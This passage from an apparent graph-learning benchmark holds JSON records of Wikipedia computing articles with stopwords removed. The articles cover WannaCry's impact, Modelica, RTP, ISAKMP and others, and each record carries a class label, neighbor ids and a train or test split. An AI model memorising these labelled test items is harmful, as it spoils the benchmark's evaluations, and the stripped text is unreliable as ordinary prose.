non-critical emergencies ambulances diverted 2016 thousands computers 42 separate nhs trusts england reported still running windows xp 2018 report members parliament concluded 200 nhs hospitals organizations checked wake wannacry attack still failed cyber security checks nhs hospitals wales northern ireland unaffected attack nissan motor manufacturing uk tyne wear england halted production ransomware infected systems renault also stopped production several sites attempt stop spread ransomware spain telefónica fedex deutsche bahn hit along many countries companies worldwide attack impact said relatively low compared potential attacks type could much worse marcus hutchins discovered kill-switch built creators specifically targeted highly critical infrastructure like nuclear power plants dams railway systems according cyber-risk-modeling firm cyence economic losses cyber attack could reach us 4 billion groups estimating losses hundreds millions following alphabetical list organisations confirmed affected number experts highlighted nsa non-disclosure underlying vulnerability loss control eternalblue attack tool exploited edward snowden said nsa privately disclosed flaw used attack hospitals found lost attack may happened british cybersecurity expert graham cluley also sees culpability part u.s. intelligence services according others could done something ages ago get problem fixed n't also said despite obvious uses tools spy people interest duty protect countries citizens others also commented attack shows practice intelligence agencies stockpile exploits offensive purposes rather disclosing defensive purposes may problematic microsoft president chief legal officer brad smith wrote repeatedly exploits hands governments leaked public domain caused widespread damage equivalent scenario conventional weapons would u.s. military tomahawk missiles stolen russian president vladimir putin placed responsibility attack u.s. intelligence services created eternalblue 17 may 2017 united states bipartisan lawmakers introduced patch act aims exploits reviewed independent board balance need disclose vulnerabilities national security interests increasing transparency accountability maintain public trust process 15 june 2017 united states congress hold hearing attack two subpanels house science committee hear testimonies various individuals working government non-governmental sector us improve protection mechanisms systems similar attacks future cybersecurity researcher working loose collaboration uk national cyber security centre researched malware discovered kill switch later globally dispersed security researchers collaborated online develop open source tools allow decryption without payment circumstances snowden states nsa-enabled ransomware eats internet help comes researchers spy agencies asks case experts also used publicity around attack chance reiterate value importance good regular secure backups good cybersecurity including isolating critical systems using appropriate software latest security patches installed adam segal director digital cyberspace policy program council foreign relations stated patching updating systems broken basically private sector government agencies addition segal said governments apparent inability secure vulnerabilities opens lot questions backdoors access encryption government argues needs private sector security arne schönbohm president germany federal office information security bsi stated current attacks show vulnerable digital society wake-up call companies finally take security seriously effects attack also political implications united kingdom impact national health service quickly became political claims effects exacerbated government underfunding nhs particular nhs ceased paid custom support arrangement continue receiving support unsupported microsoft software used within organization including windows xp home secretary amber rudd refused say whether patient data backed shadow health secretary jon ashworth accused health secretary jeremy hunt refusing act critical note microsoft national cyber security centre ncsc national crime agency received two months previously others argued hardware software vendors often fail account future security flaws selling systems − due technical design market incentives − eventually wo n't able properly receive apply patches nhs denied still using xp claiming 4.7 devices within organization ran windows xp cost attack nhs estimated £92 million disruption services upgrades attack nhs digital refused finance estimated £1 billion meet cyber essentials plus standard information security certification organized uk ncsc saying would constitute value money invested £60 million planned spend £150 million next two years address key cyber security weaknesses suggested future attack magnitude may defined terrorism act parliament adds provision stating malicious use computer matter world located degrades seriously harms healthcare power life support critical infrastructure form terrorism may elicit proportional response possibly could added revision policing crime act 2017 late june hundreds computer users reported sent email someone multiple people claiming developers wannacry email threatened destroy victims data unless sent 0.1 btc bitcoin address hackers",
    "neighbors": [
      1024,
      1540,
      5636,
      4117,
      8726,
      535,
      9761,
      3619,
      4644,
      4133,
      6707,
      5173,
      5693,
      1087,
      10823,
      1608,
      3657,
      8779,
      4689,
      1622,
      4703,
      8288,
      8292,
      7786,
      107,
      8299,
      3704,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      7855,
      9904,
      6834,
      9395,
      8886,
      704,
      8900,
      3789,
      7887,
      4304,
      11476,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      3867,
      3366,
      297,
      2857,
      8489,
      11052,
      9518,
      7983,
      1337,
      6484,
      857,
      1882,
      7515,
      3423,
      9569,
      10600,
      2409,
      3956,
      9082,
      10110,
      11152,
      3473,
      10132,
      4505,
      1440,
      5024,
      11168,
      5028,
      3495,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      11198,
      9664,
      8133,
      4054,
      7639,
      8664,
      9688,
      11225,
      8668,
      1504,
      9186,
      4074,
      2542,
      507,
      7164,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9376,
    "label": 9,
    "text": "Modelica:modelica modelica object-oriented declarative multi-domain modeling language component-oriented modeling complex systems e.g. systems containing mechanical electrical electronic hydraulic thermal control electric power process-oriented subcomponents free modelica language developed non-profit modelica association modelica association also develops free modelica standard library contains 1360 generic model components 1280 functions various domains version 3.2.1 modelica resembles object-oriented programming languages c++ java differs two important respects first modelica modeling language rather conventional programming language modelica classes compiled usual sense translated objects exercised simulation engine simulation engine specified language although certain required capabilities outlined second although classes may contain algorithmic components similar statements blocks programming languages primary content set equations contrast typical assignment statement left-hand side statement assigned value calculated expression right-hand side equation may expressions right- left-hand sides example equations describe assignment equality modelica terms equations pre-defined causality simulation engine may usually must manipulate equations symbolically determine order execution components equation inputs outputs modelica design effort initiated september 1996 hilding elmqvist goal develop object-oriented language modeling technical systems order reuse exchange dynamic system models standardized format modelica 1.0 based phd thesis hilding elmqvist experience modeling languages allan dymola nmf objectmath omola sidops+ smile hilding elmqvist key architect modelica many people contributed well see appendix e september 1997 version 1.0 modelica specification released basis prototype implementation within commercial dymola software system year 2000 non-profit modelica association formed manage continually evolving modelica language development free modelica standard library year usage modelica industrial applications started table presents timeline modelica specification history commercial front-ends modelica include amesim french company imagine sa part siemens plm software dymola swedish company dynasim ab part dassault systemes cymodelica american company cydesign labs esi group wolfram systemmodeler formerly mathmodelica swedish company wolfram mathcore ab part wolfram research simulationx german company esi iti gmbh maplesim canadian company maplesoft catia systems jmodelica.org extensible modelica-based open source platform optimization simulation analysis complex dynamic systems main objective project create industrially viable open source platform simulation optimization modelica models offering flexible platform serving virtual lab algorithm development research openmodelica open-source modelica-based modeling simulation environment intended industrial academic usage long-term development supported non-profit organization – open source modelica consortium osmc goal openmodelica effort create comprehensive open source modelica modeling compilation simulation environment based free software distributed binary source code form research teaching industrial usage free simulation environment scicos uses subset modelica component modeling support larger part modelica language currently development nevertheless still incompatibility diverging interpretation different tools concerning modelica language following code fragment shows simple example first order system formula_1 model firstorder equation end firstorder interesting things note example 'parameter qualifier indicates given variable time-invariant 'der operator represents symbolically time derivative variable also worth noting documentation strings associated declarations equations main application area modelica modeling physical systems basic structuring concepts shown hand simple examples electrical domain modelica four built-in types real integer boolean string typically user-defined types derived associate physical quantity unit nominal values attributes type voltage real quantity= electricalpotential unit= v type current real quantity= electricalcurrent unit= interaction component components defined physical ports called connectors e.g. electrical pin defined connector pin electrical pin end pin drawing connection lines ports meaning corresponding connector variables without flow prefix identical v corresponding connector variables flow prefix defined zero-sum equation sum corresponding flow variables zero motivation automatically fulfill relevant balance equations infinitesimally small connection point basic model component defined model contains equations describe relationship connector variables declarative form i.e. without specifying calculation order model capacitor equation end capacitor goal connected set model components leads set differential algebraic discrete equations number unknowns number equations identical modelica achieved requiring called balanced models full rules defining balanced models rather complex read however cases simple rule issued counts variables equations way simulation tools given variables equations must counted according following rule note standard input connectors realinput integerinput contribute count variables since new variables defined inside reason rule understood thinking capacitor defined pins contain flow variable i.e current check connected nothing corresponds set equation pin.i=0 pin must add equation flow variable obviously example extended cases kinds flow variables involved e.g forces torques etc. capacitor connected another balanced model one pins connection equation generated substitute two i=0 equations pins connected since connection equation corresponds two scalar equations connection operation leave balanced larger model constituted capacitor model connected capacitor model balanced since verification using openmodelica model gives fact another example containing input connectors physical connectors following component modelica standard library model signalvoltage equation end signalvoltage component signalvoltage balanced since checking openmodelica gives hierarchical model built-up basic models instantiating basic models providing suitable values model parameters connecting model connectors typical example following electrical circuit model circuit equation end circuit via language element annotation ... definitions added model influence simulation annotations used define graphical layout documentation version information basic set graphical annotations standardized ensure graphical appearance layout models different modelica tools freely available book modelica example contains many examples like along detailed explanations nearly language features modelica version 3.3 modelica designed domain neutral result used wide variety applications fluid systems example steam power generation hydraulics etc automotive applications especially powertrain mechanical systems example multi-body systems mechatronics etc. automotive sector many major automotive oems using modelica include ford general motors toyota bmw daimler modelica also increasingly used simulation thermo-fluid energy systems characteristics modelica acausal object-oriented domain neutral make well suited system-level simulation domain modelica well established",
    "neighbors": [
      9345,
      10764,
      8079,
      7326,
      1443,
      7593,
      5677,
      7983,
      8113,
      6450,
      9915,
      68,
      5830,
      11207,
      587,
      9431,
      8162,
      4454,
      11625,
      5612,
      3567,
      10102,
      1917
    ],
    "mask": "Test"
  },
  {
    "node_id": 9377,
    "label": 2,
    "text": "Windows_To_Go:windows go windows go feature windows 8 enterprise windows 8.1 enterprise windows 10 education windows 10 enterprise windows 10 pro limited education enterprise image allows boot run certain usb mass storage devices usb flash drives external hard disk drives certified microsoft compatible fully manageable corporate windows environment intended allow enterprise administrators provide users imaged version windows reflects corporate desktop creation windows go drives officially supported non-enterprise education windows 8.1 editions however enterprise education versions windows 10 supported information published describing various ways install windows go using version windows 8.x 10 bootable usb device windows 8 embedded versions windows windows embedded standard 7 supported booting usb storage devices april 2011 leak windows 8 build 7850 users noticed builds included program called portable workspace creator indicating intended create bootable usb drives windows 8 september 2011 microsoft officially announced windows go build conference distributed bootable 32 gb usb flash drives windows go pre-installed windows go several significant differences compared standard installation windows 8 non-removable storage hard disk drives solid-state drives windows go works usb 2.0 faster usb connections legacy bios uefi firmware usb drives used environment microsoft set specific requirements usb drive must meet order supported device june 2017 12 usb devices listed supported microsoft windows go using pc host hardware certified use either windows 7 windows 8 work well windows go although microsoft provide support feature windows rt macintosh computers possible boot windows go mac new companion device license microsoft software assurance employees use windows go software assurance licensed computer well home pc simon bisson writing zdnet called windows go one interesting features windows 8 noting even though using usb 2.0 port performance good noticeable lag calling useful way running windows 8 michael s. lasky writing laptopmag.com wrote departments want ensure employees safely access corporate network windows go usb drives incredibly convenient ability instantly remake windows pc secure personal computer worthwhile productive time-saver release windows 10 may 2019 update version 1903 microsoft announced windows go longer developed feature support os major feature updates therefore enable user stay current specific certified type performant usb media needed feature provide good user experience also longer produced oems",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      4637,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10306,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9806,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      1150,
      10879,
      8328,
      8841,
      6797,
      8847,
      10896,
      2193,
      9874,
      10900,
      4248,
      7838,
      7840,
      3235,
      4771,
      5284,
      6820,
      1703,
      2221,
      5300,
      9910,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      6371,
      4836,
      4326,
      2279,
      1770,
      7914,
      3308,
      10993,
      3834,
      2811,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      2383,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      6012,
      2943,
      1418,
      5003,
      5004,
      8080,
      4500,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      488,
      1515,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 9378,
    "label": 7,
    "text": "TOA_Technologies:toa technologies toa technologies provides software service-based field service management software customer appointment scheduling solutions services enterprises worldwide headquartered beachwood ohio company develops markets sells etadirect web-based applications solution provides advanced tools companies small medium large mobile workforces automate optimize planning scheduling appointment booking well routing job allocation real-time management type field service event etadirect include applications forecasting capacity management routing real-time field management/dispatch advanced html 5-based mobility app field employees also includes apps collaboration location-based information customer communications etadirect powered patented algorithm continuously learns mobile employees ’ work patterns analyzes statistically uses pattern recognition accurately predict employee time arrival customer location length job/appointment take thereby providing enhanced accuracy planning customer experience management etadirect typically narrows wait window less 60 minutes using time-based predictions etadirect communicate consumers exact time field service employee arrive via voice/ivr email text/sms twitter communications channels reducing customer frustration wasted time inquiry calls service provider call centers software delivered businesses internet using software service/esaas model etadirect currently used seven top ten cable television companies north america including cox communications major broadband operators europe virgin media ono spain global communications companies telefonica global utility companies like e.on toa technologies founded yuval brisker irad carmi 2003 company privately held employs 550 employees worldwide headquartered beachwood ohio additional offices london united kingdom sao paulo brazil principal venture shareholders technology crossover ventures draper triangle ventures dfj network affiliate intel capital sutter hill ventures toa stands time arrival concept time central etadirect software solution set central algorithm measures time predicts performance based resource specific pattern recognition predictive analytics yields accurate time arrival estimates alternative managing service appointments according averages human resource capabilities availability december 2013 toa 85,000 users oracle corporation announced acquiring toa technologies july 31 2014 april 6 2010 toa issued u.s. patent 7,693,735 entitled dynamic schedule mediation predictive performance-pattern based mobile workforce management system proactive customer communications methodology october 2012 gartner recognized toa technologies leader magic quadrant field service management first time toa technologies named leader gartner magic quadrant field service management 2013 report gartner stated toa best-of-breed field service optimization vendor based solely cloud toa named one america promising companies 2013 forbes magazine july 2013 toa closed major round funding technology crossover ventures raising 66 million transform global field service management july 31 2014 oracle corporation announced buying toa technologies transaction closed mid-september 2014",
    "neighbors": [
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9379,
    "label": 0,
    "text": "International_Committee_on_Computational_Linguistics:international committee computational linguistics international committee computational linguistics iccl founded dr. david hays rand corporation 1965 promote biennial international conference computational linguistics since third conference stockholm known acronym coling swedish fictional character kolingen albert engström current president iccl professor jun-ichi tsujii university tokyo membership committee permanent",
    "neighbors": [
      1890,
      4131,
      3668,
      2126
    ],
    "mask": "Test"
  },
  {
    "node_id": 9380,
    "label": 5,
    "text": "Real_Time_Streaming_Protocol:real time streaming protocol real time streaming protocol rtsp network control protocol designed use entertainment communications systems control streaming media servers protocol used establishing controlling media sessions end points clients media servers issue vhs-style commands play record pause facilitate real-time control media streaming server client video demand client server voice recording transmission streaming data task rtsp rtsp servers use real-time transport protocol rtp conjunction real-time control protocol rtcp media stream delivery however vendors implement proprietary transport protocols rtsp server software realnetworks example also used realnetworks proprietary real data transport rdt rtsp developed realnetworks netscape columbia university first draft submitted ietf 1996 standardized multiparty multimedia session control working group mmusic wg internet engineering task force ietf published rfc 2326 1998 rtsp 2.0 published rfc 7826 2016 replacement rtsp 1.0 rtsp 2.0 based rtsp 1.0 backwards compatible basic version negotiation mechanism similar ways http rtsp defines control sequences useful controlling multimedia playback http stateless rtsp state identifier used needed track concurrent sessions like http rtsp uses tcp maintain end-to-end connection rtsp control messages sent client server commands travel direction i.e server client presented basic rtsp requests typical http requests like options request also available default transport layer port number 554 tcp udp latter rarely used control requests rtsp using rtp rtcp allows implementation rate adaptation many cctv security cameras often called ip cameras support rtsp streaming especially onvif profiles g",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10270,
      10271,
      3105,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      4219,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9381,
      3751,
      3752,
      6825,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      8386,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      225,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      7984,
      10033,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      891,
      6524,
      11647,
      10115,
      6541,
      7570,
      1942,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      3019,
      2509,
      9167,
      8669,
      8670,
      10723,
      10727,
      3564,
      508,
      3573,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 9381,
    "label": 5,
    "text": "Real-time_Transport_Protocol:real-time transport protocol real-time transport protocol rtp network protocol delivering audio video ip networks rtp used communication entertainment systems involve streaming media telephony video teleconference applications including webrtc television services web-based push-to-talk features rtp typically runs user datagram protocol udp rtp used conjunction rtp control protocol rtcp rtp carries media streams e.g. audio video rtcp used monitor transmission statistics quality service qos aids synchronization multiple streams rtp one technical foundations voice ip context often used conjunction signaling protocol session initiation protocol sip establishes connections across network rtp developed audio-video transport working group internet engineering task force ietf first published 1996 superseded 2003 rtp designed end-to-end real-time transfer streaming media protocol provides facilities jitter compensation detection packet loss out-of-order delivery common especially udp transmissions ip network rtp allows data transfer multiple destinations ip multicast rtp regarded primary standard audio/video transport ip networks used associated profile payload format design rtp based architectural principle known application-layer framing protocol functions implemented application opposed operating system protocol stack real-time multimedia streaming applications require timely delivery information often tolerate packet loss achieve goal example loss packet audio application may result loss fraction second audio data made unnoticeable suitable error concealment algorithms transmission control protocol tcp although standardized rtp use normally used rtp applications tcp favors reliability timeliness instead majority rtp implementations built user datagram protocol udp transport protocols specifically designed multimedia sessions sctp dccp although widespread use rtp developed audio/video transport working group ietf standards organization rtp used conjunction protocols h.323 rtsp rtp specification describes two protocols rtp rtcp rtp used transfer multimedia data rtcp used periodically send control information qos parameters data transfer protocol rtp carries real-time data information provided protocol include timestamps synchronization sequence numbers packet loss reordering detection payload format indicates encoded format data control protocol rtcp used quality service qos feedback synchronization media streams bandwidth rtcp traffic compared rtp small typically around 5 rtp sessions typically initiated communicating peers using signaling protocol h.323 session initiation protocol sip rtsp jingle xmpp protocols may use session description protocol specify parameters sessions rtp session established multimedia stream audio video streams may use separate rtp sessions enabling receiver selectively receive components particular stream session consists destination ip address pair ports rtp rtcp specification recommends rtp port numbers chosen even associated rtcp port next higher odd number however single port chosen rtp rtcp applications multiplex protocols rtp rtcp typically use unprivileged udp ports 1024 65535 may also use transport protocols notably sctp dccp protocol design transport independent one design considerations rtp carry range multimedia formats allow new formats without revising rtp standard end information required specific application protocol included generic rtp header instead provided separate rtp profiles associated payload formats class application e.g. audio video rtp defines profile one associated payload formats complete specification rtp particular application usage requires profile payload format specifications profile defines codecs used encode payload data mapping payload format codes payload type pt field rtp header profile accompanied several payload format specifications describes transport particular encoded data audio payload formats include g.711 g.723 g.726 g.729 gsm qcelp mp3 dtmf video payload formats include h.261 h.263 h.264 h.265 mpeg-1/mpeg-2 mapping mpeg-4 audio/video streams rtp packets specified h.263 video payloads described examples rtp profiles include rtp packets created application layer handed transport layer delivery unit rtp media data created application begins rtp packet header rtp header minimum size 12 bytes header optional header extensions may present followed rtp payload format determined particular class application fields header follows functional network-based system includes protocols standards conjunction rtp protocols sip jingle rtsp h.225 h.245 used session initiation control termination standards h.264 mpeg h.263 used encode payload data specified applicable rtp profile rtp sender captures multimedia data encodes frames transmits rtp packets appropriate timestamps increasing timestamps sequence numbers sender sets payload type field accordance connection negotiation rtp profile use rtp receiver detects missing packets may reorder packets decodes media data packets according payload type presents stream user",
    "neighbors": [
      10242,
      1030,
      9734,
      1036,
      8211,
      6681,
      6682,
      10270,
      10271,
      6177,
      6689,
      9251,
      10274,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      11332,
      6216,
      8265,
      4687,
      1631,
      10341,
      614,
      10344,
      3695,
      4723,
      2679,
      4729,
      4219,
      5251,
      9860,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      8864,
      9380,
      3751,
      3752,
      6825,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      10444,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      7407,
      8432,
      8946,
      5875,
      3322,
      9987,
      3847,
      1297,
      10005,
      5402,
      5405,
      6951,
      9511,
      7984,
      10035,
      2356,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10055,
      10058,
      849,
      6993,
      1876,
      5972,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      367,
      6512,
      891,
      6524,
      2431,
      11647,
      1411,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6567,
      9131,
      432,
      6577,
      2996,
      5045,
      10171,
      3006,
      9156,
      9670,
      3019,
      2509,
      9681,
      8669,
      8670,
      10723,
      4068,
      10727,
      3564,
      3573,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 9382,
    "label": 2,
    "text": "Authorized_Program_Analysis_Report:authorized program analysis report apar authorized program analysis report pronounced a-par rhymes far ibm designation document intended identify situations could result potential problems also serves request correction defect current releases ibm-supplied programs occasionally ibm software bug ascertained situation caused problems third-party hardware software user configuration errors ibm support staff suspect defect current release ibm program cause file formal report confirming existence issue addition confirming existence issue apars include information known workarounds information whether formal fix scheduled included future releases whether program temporary fix ptf planned ibm program facilitate documenting problem least 2 levels fix ptf permanent correction respect vrm version release modification level product applicable temporary fix sense problem correction temporarily available permanent fix later incorporated product base code thereby longer fix although associated ptf and/or apar numbers rule included source documentation associated ensuing base code update sidr xerox acronym covering apar ptf acronym referred system improvement difficulty report sir system improvement request terminology digital equipment corporation used much xerox used sidr",
    "neighbors": [
      2172
    ],
    "mask": "Test"
  },
  {
    "node_id": 9383,
    "label": 5,
    "text": "Internet_Security_Association_and_Key_Management_Protocol:internet security association key management protocol isakmp internet security association key management protocol protocol defined rfc 2408 establishing security associations sa cryptographic keys internet environment isakmp provides framework authentication key exchange designed key exchange independent protocols internet key exchange kerberized internet negotiation keys provide authenticated keying material use isakmp example ike describes protocol using part oakley part skeme conjunction isakmp obtain authenticated keying material use isakmp security associations ah esp ietf ipsec doi isakmp defines procedures authenticating communicating peer creation management security associations key generation techniques threat mitigation e.g denial service replay attacks framework isakmp typically utilizes ike key exchange although methods implemented kerberized internet negotiation keys preliminary sa formed using protocol later fresh keying done isakmp defines procedures packet formats establish negotiate modify delete security associations sas contain information required execution various network security services ip layer services header authentication payload encapsulation transport application layer services self-protection negotiation traffic isakmp defines payloads exchanging key generation authentication data formats provide consistent framework transferring key authentication data independent key generation technique encryption algorithm authentication mechanism isakmp distinct key exchange protocols order cleanly separate details security association management key management details key exchange may many different key exchange protocols different security properties however common framework required agreeing format sa attributes negotiating modifying deleting sas isakmp serves common framework isakmp implemented transport protocol implementations must include send receive capability isakmp using udp port 500 openbsd first implemented isakmp 1998 via isakmpd 8 software ipsec services service microsoft windows handles functionality kame project implements isakmp linux open source bsds modern cisco routers implement isakmp vpn negotiation leaked nsa presentations released der spiegel indicate isakmp exploited unknown manner decrypt ipsec traffic ike researchers discovered logjam attack state breaking 1024-bit diffie–hellman group would break 66 vpn servers 18 top million https domains 26 ssh servers consistent researchers claim consistent leaks",
    "neighbors": [
      10908,
      1634,
      4874,
      6797,
      1616,
      6993,
      11569,
      11413,
      732,
      3742,
      9151
    ],
    "mask": "Train"
  },
  {
    "node_id": 9384,
    "label": 4,
    "text": "Melvin_Currie:melvin currie melvin mel robert currie american mathematician cryptographer former chief cryptographic research design division national security agency recognitions include 2007 crypto-mathematics institute leadership award director distinguished service medal author 2018 popular mathematics book mathematics rhyme reason published jointly american mathematical society mathematical sciences research institute currie african-american born pittsburgh pennsylvania 1948 parents separated six currie spent rest childhood living mother younger brother maternal grandparents currie received ba yale university majored mathematics economics went graduate school university pittsburgh received phd 1983 advisor william fleissner title dissertation metric characterization irrationals via group operation",
    "neighbors": [
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 9385,
    "label": 9,
    "text": "Expression-oriented_programming_language:expression-oriented programming language expression-oriented programming language programming language every nearly every construction expression thus yields value typical exceptions macro definitions preprocessor commands declarations expression-oriented languages often treat statements rather expressions expression-oriented languages introduce void return type yielded expressions merely cause side-effects algol 68 lisp examples expression-oriented languages pascal expression-oriented language functional programming languages expression-oriented critics including language designers blame expression-orientation entire class programming mistakes wherein programmer introduces assignment expression meant test equality example designers ada java worried type mistake restricted control expressions evaluate strictly boolean data type designers python similar worries took alternative strategy implementing assignment statement rather expression thus prohibiting assignment nesting inside statement expression",
    "neighbors": [
      7169,
      9345,
      8582,
      5896,
      9224,
      6160,
      1051,
      9245,
      3876,
      11688,
      7851,
      428,
      5677,
      1591,
      10042,
      7612,
      8385,
      8262,
      9926,
      1611,
      7627,
      10571,
      7889,
      5081,
      6502,
      8554,
      9454,
      2680,
      3705
    ],
    "mask": "None"
  },
  {
    "node_id": 9386,
    "label": 1,
    "text": "TransLattice:translattice translattice software company based santa clara california geographically distributes databases applications enterprise cloud hybrid environments translattice offers newsql database application platform translattice founded 2007 officially launched 2010 company co-founders frank huerta ceo mike lyle executive vp engineering robert geiger previously worked together recourse technologies translattice based santa clara california august 2008 company received 9.5 million series funding dcm early stage capital venture funding company 2013 translattice acquired stormdb database-as-a-service startup stormdb clustered postgresql fork open sourced 2014 name postgres-xl translattice specializes distributed databases application platforms enterprise cloud systems company developed geographically-distributed computing-architecture allows single database run multiple nodes located anywhere translattice elastic database ted newsql database management system enables building highly available fault tolerant data fabric multiple nodes located anywhere world translattice database fully sql/acid-compliant ted operates cohesive single database translattice provided world first geographically-distributed relational database management system rdbms deploy multiple public-cloud-provider networks time well virtual machines physical hardware combination thereof",
    "neighbors": [
      10048,
      8539,
      4861,
      10413
    ],
    "mask": "Test"
  },
  {
    "node_id": 9387,
    "label": 8,
    "text": "LiteSpeed_Web_Server:litespeed web server litespeed web server lsws proprietary web server software 4th popular web server estimated used 4.6 websites august 2019 lsws developed privately held litespeed technologies software uses configuration format apache http server compatible apache features lsws released 2003 august 2008 became 16th popular web server november 2016 litespeed market share grew 0.39 3.29 increasing position 10th 4th popular web server according netcraft 2017 team hong kong polytechnic university found one six popular web servers estimated team rwth aachen university running 9.2 http/2-enabled websites august 2019 lsws used 58.9 websites using quic litespeed web server lsws compatible commonly-used apache features including mod_rewrite .htaccess mod_security lsws load apache configuration files directly works drop-in replacement apache fully integrating popular control panels lsws replaces apache functions uses event driven approach handle requests litespeed technologies founded early 2002 team engineers led george wang july 1 2003 litespeed web server officially released full-featured web server 2007 litespeed web server became litespeed web server enterprise configured apache drop-in replacement year web server integrated cpanel directadmin plesk litespeed web server officially began supporting http/2 2015 version 5.0 also released lscache cache plugin wordpress esi version 5.0.10 2017 lsws released quic support",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      11154,
      7443,
      1556,
      10138,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      8358,
      9125,
      11682,
      7338,
      44,
      7983,
      10800,
      11439,
      6714,
      64,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      865,
      1250,
      2404,
      4837,
      6379,
      9580,
      2287,
      9455,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966,
      4095
    ],
    "mask": "Train"
  },
  {
    "node_id": 9388,
    "label": 6,
    "text": "ZipIt:zipit zipit shareware data compression utility archiving compressing files classic mac os mac os x platforms designed highly compatible pkzip ms-dos machines reading writing files well performing necessary line ending conversion macbinary encoding ensure files usable platforms advanced user interface offered number automation features including applescript support first released 1993 latest version zipit version 2.2.2 released late 2002 unique feature original mac file system use forks essentially two separate files finder maintained illusion single file files copied storage media automatically copied forks systems support feature risked problem transmitting one two forks producing unusable file led number archive formats combined two forks along extended metadata single file suitable hosting platforms original pkzip archive format include number features intended help support file systems like mac including things like longer filenames basic metadata however support forks therefore directly capable supporting mac files zip archives present major problem many use-cases mac archive utilities support features like stuffit compact pro early 1990s however zip format becoming almost universal number systems required data exchange notable among fidonet mailers offline mail readers like qwk format times mac users exchange simple files like text file pc user utilities like unzip maczip worked single files include mac-like interface suitable basic tasks zipit introduced address problem explicitly modeling program user interface compact pro lauded one easiest use archivers available zipit essentially replaced compact pro internal compression system pkzips producing program looked similar read wrote zip files instead cpt zipit also included number automation features notably support applescript allowed used programs like freddie qwk reader setting zterm allowed downloaded zip files automatically associated zipit making download-and-open simple task initial stable version 1.1.1 released march 1993 allowed multiple archives opened created one separate window version support hierarchical directories instead encoded files single-level archive downside would allow one file given name archive addressed 1.2.x versions settled final version 1.2.x series version 1.2.6 1994 2001 version 2.0 released version supported mac os x mac os 9 tests 1.1.1 zipit consistently outperformed compact pro stuffit terms compression 10 average speed stuffit making half speed fast compact pro",
    "neighbors": [
      576,
      2432,
      9762,
      3368,
      10121,
      9166,
      7983,
      722,
      2389,
      3167
    ],
    "mask": "Test"
  },
  {
    "node_id": 9389,
    "label": 1,
    "text": "Firebird_(database_server):firebird database server firebird open-source sql relational database management system runs linux microsoft windows macos several unix platforms database forked borland open source edition interbase 2000 since firebird 1.5 code largely rewritten within week interbase 6.0 source released borland 25 july 2000 firebird project created sourceforge firebird 1.0 released linux microsoft windows mac os x 11 march 2002 ports solaris freebsd 4 hp-ux following next two months work porting codebase c c++ began 2000 23 february 2004 firebird 1.5 released first stable release new codebase version 1.5 featured improved query optimizer sql-92 conditional expressions savepoints support explicit locking firebird 2.0 released 12 november 2006 adding support 64-bit architectures tables nested clauses programmable lock timeouts blocking transactions previous stable release version 2.1.6 added new features including procedural triggers recursive queries support merge statements firebird 2.5 introduced new features like improved multithreading regular expression syntax ability query remote databases recent stable version firebird 3.0 released 19 april 2016 focus performance security major re-architecture code allowed total support smp machines using superserver version google summer code 2013 work begun integrating firebird replacement hsqldb libreoffice april 2003 mozilla organization announced rename web browser phoenix firebird trademark dispute phoenix technologies decision caused concern within firebird database project due assumption users internet search engines would confused 